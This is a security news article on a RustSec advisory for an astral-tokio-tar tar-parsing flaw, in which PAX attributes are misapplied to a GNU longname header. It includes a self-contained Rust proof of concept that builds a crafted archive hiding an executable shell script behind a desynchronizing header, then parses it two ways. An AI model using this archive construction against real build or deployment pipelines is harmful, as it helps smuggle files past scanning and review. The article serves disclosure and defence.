
RustSec flags astral-tokio-tar archive bug, file smuggling risk

A crafted tar archive could look harmless to one parser and dangerous to another, letting files slip past scans in Rust build and deployment pipelines.

Sam Ortega · 2 min read

One tarball can still fool different tools in different ways, and that is exactly the problem RustSec flagged in astral-tokio-tar. The new advisory, RUSTSEC-2026-0145, says versions before 0.6.2 mishandle PAX headers when multiple tar headers precede a file entry. The result is a parser differential: the same archive can extract differently depending on which tar implementation reads it.

RustSec lists the bug as reported on May 18 and issued the advisory on May 19, mapping it to GHSA-3cv2-h65g-fgmm and rating it Moderate. GitHub's advisory says the only fix is to upgrade, and that users should not expect breaking changes from 0.6.2. The bug matters because it is not just a correctness glitch inside one crate. A malicious archive can pass inspection by one parser and then unpack differently under another, which is exactly how files get smuggled past review, scanning, or policy enforcement.


The failure mode is specific. A PAX extended header (typeflag 'x') carries attributes, such as an overriding path or size, that belong to the next file entry, and a GNU longname header (typeflag 'L') carries a long file name for the next entry; both are metadata, not files. When a tar stream contains a PAX extension, then a GNU longname header, then the file entry, astral-tokio-tar before 0.6.2 applies the PAX attributes to the very next header, the longname header, regardless of its type, instead of carrying them to the file entry. A PAX size override applied to the longname header, for instance, changes how many bytes are consumed as name data, and from then on the crate's view of the stream is out of step with a parser that handles the ordering correctly, so the same bytes yield different entries. In a build pipeline, package installer, or deployment job, that kind of mismatch can turn archive inspection into a false sense of safety.
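To make the differential concrete, here is an added example in plain Rust with no dependencies. It is not astral-tokio-tar's code and not the advisory's reproducer. It builds a constructed archive in the order the advisory describes, a PAX 'x' header, then a GNU 'L' longname header, then the file entry, and parses it twice: once holding PAX attributes for the next real file entry, and once under a simplified model of the reported behaviour in which pending PAX attributes are applied to whatever header comes next. In the second mode the PAX size override, applied to the longname header, swallows the real file header as name data, and the parser resynchronizes on a second header that the archive's author hid inside the first file's payload. The header layout, file names, PAX records and script contents are all constructed for the illustration, and how closely the model matches the crate's internals is an assumption.

```rust
// Added example, not astral-tokio-tar's code: a std-only tar reader over a constructed archive.
use std::collections::HashMap;

const BLOCK: usize = 512;

pub struct Entry { pub name: String, pub mode: u32, pub data: Vec<u8> }

/// One ustar header block with a valid checksum.
pub fn header(name: &str, typeflag: u8, size: usize, mode: u32) -> [u8; BLOCK] {
    let mut h = [0u8; BLOCK];
    h[..name.len()].copy_from_slice(name.as_bytes());
    h[100..107].copy_from_slice(format!("{:07o}", mode).as_bytes());
    h[124..135].copy_from_slice(format!("{:011o}", size).as_bytes());
    h[148..156].copy_from_slice(b"        "); // checksum bytes count as spaces
    h[156] = typeflag;
    h[257..265].copy_from_slice(b"ustar\x0000"); // magic + version
    let sum: u32 = h.iter().map(|&b| u32::from(b)).sum();
    h[148..155].copy_from_slice(format!("{:06o}\0", sum).as_bytes());
    h
}

/// Header block plus data, zero-padded to whole 512-byte blocks.
fn entry(name: &str, typeflag: u8, data: &[u8], mode: u32) -> Vec<u8> {
    let mut v = header(name, typeflag, data.len(), mode).to_vec();
    v.extend_from_slice(data);
    v.resize(v.len() + (BLOCK - data.len() % BLOCK) % BLOCK, 0);
    v
}

fn cstr(b: &[u8]) -> String {
    String::from_utf8_lossy(&b[..b.iter().position(|&x| x == 0).unwrap_or(b.len())]).into_owned()
}

fn octal(b: &[u8]) -> usize { usize::from_str_radix(cstr(b).trim(), 8).unwrap_or(0) }

fn checksum_ok(h: &[u8]) -> bool {
    let sum: usize = h.iter().enumerate()
        .map(|(i, &b)| if (148..156).contains(&i) { 32 } else { b as usize }).sum();
    sum == octal(&h[148..156])
}

/// PAX records look like "<len> <key>=<value>\n", where len counts the whole record.
fn parse_pax(data: &[u8]) -> HashMap<String, String> {
    let (mut out, mut rest) = (HashMap::new(), data);
    while let Some(sp) = rest.iter().position(|&b| b == b' ') {
        let len: usize = match cstr(&rest[..sp]).parse() { Ok(n) if n > sp + 1 && n <= rest.len() => n, _ => break };
        if let Some((k, v)) = String::from_utf8_lossy(&rest[sp + 1..len - 1]).split_once('=') {
            out.insert(k.to_string(), v.to_string());
        }
        rest = &rest[len..];
    }
    out
}

/// `pax_to_any_header` models the reported bug: pending PAX attributes are applied to
/// whatever header comes next, even a GNU 'L' longname header, instead of to the file entry.
pub fn parse(archive: &[u8], pax_to_any_header: bool) -> Result<Vec<Entry>, String> {
    let (mut entries, mut pos) = (Vec::new(), 0);
    let (mut pax, mut longname): (HashMap<String, String>, Option<String>) = (HashMap::new(), None);
    while pos + BLOCK <= archive.len() {
        let h = &archive[pos..pos + BLOCK];
        pos += BLOCK;
        if h.iter().all(|&b| b == 0) { break; } // end-of-archive marker
        if !checksum_ok(h) { return Err(format!("bad checksum at offset {}", pos - BLOCK)); }
        let (typeflag, mut name) = (h[156], cstr(&h[..100]));
        let (mut size, mode) = (octal(&h[124..136]), octal(&h[100..108]) as u32);
        // Correct behaviour: 'x' and 'L' are metadata and must not consume pending PAX attributes.
        let applied = if pax_to_any_header || !matches!(typeflag, b'x' | b'L') { std::mem::take(&mut pax) } else { HashMap::new() };
        if let Some(s) = applied.get("size") { size = s.parse().map_err(|_| "bad PAX size".to_string())?; }
        let end = pos + (size + BLOCK - 1) / BLOCK * BLOCK;
        if end > archive.len() { return Err("truncated archive".to_string()); }
        let data = &archive[pos..pos + size];
        pos = end;
        match typeflag {
            b'x' => pax = parse_pax(data),
            b'L' => longname = Some(cstr(data)),
            _ => {
                if let Some(n) = longname.take() { name = n; }
                if let Some(p) = applied.get("path") { name = p.clone(); } // PAX path wins
                entries.push(Entry { name, mode, data: data.to_vec() });
            }
        }
    }
    Ok(entries)
}

/// Constructed sample: 'x' PAX, 'L' longname, a file whose ustar size is 0 while PAX says 1024,
/// and a second complete header hidden inside those 1024 bytes.
pub fn build_archive() -> Vec<u8> {
    let mut a = entry("PaxHeader/README.txt", b'x', b"13 size=1024\n24 path=docs/README.txt\n", 0o644);
    a.extend(entry("././@LongLink", b'L', b"very/long/path/evil.txt\0", 0o644));
    a.extend(header("README.txt", b'0', 0, 0o644));
    a.extend(entry("payload.sh", b'0', b"#!/bin/sh\necho smuggled\n", 0o755)); // hidden header
    a.extend([0u8; 2 * BLOCK]);
    a
}

fn main() {
    for (label, buggy) in [("PAX held for file entry", false), ("PAX applied to any header", true)] {
        for e in parse(&build_archive(), buggy).unwrap_or_default() { println!("{label}: {} mode={:o} {} bytes", e.name, e.mode, e.data.len()); }
    }
}
```

Run both modes and compare. The correct parse yields a single 1024-byte entry named docs/README.txt with mode 0644 whose content happens to contain the bytes of a tar header; the bug model yields a single executable very/long/path/evil.txt containing the shell script. A scanner that reads the archive the first way and an extractor that reads it the second way disagree about what is inside, which is the smuggling path the advisory warns about. Note that the checksum check is what makes the resynchronization realistic: the hidden header has to be valid, so the attacker controls where the desynchronized parser lands.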

This is not the first time astral-tokio-tar has tripped over tar edge cases. RustSec's package history shows earlier advisories dated October 25, 2025 and March 23, 2026. A March 16, 2026 GitHub advisory, GHSA-6gx3-4362-rf54, covered silent skipping of malformed PAX extensions in 0.5.6 and earlier. RustSec also tied the 2025 tar desynchronization issue to CVE-2025-62518. The pattern is hard to ignore: the crate keeps running into the same risky seam between archive metadata and parser behavior.

GitHub said uv is astral-tokio-tar's primary downstream user, which makes the issue especially relevant to the Python packaging path that many Rust developers touch indirectly through tooling and automation. uv 0.9.5 had already bumped astral-tokio-tar to pick up the earlier fix for archives whose ustar header and PAX extension disagree about entry size, showing how quickly archive bugs ripple into real release engineering work.

The practical takeaway is blunt: if your Rust code extracts untrusted archives, you are in the threat model now. Upgrade astral-tokio-tar to 0.6.2 or later, check your dependency tree for the crate since it may arrive transitively, retest every archive-handling path, and assume that one crafted tarball can look harmless to one tool and dangerous to another.
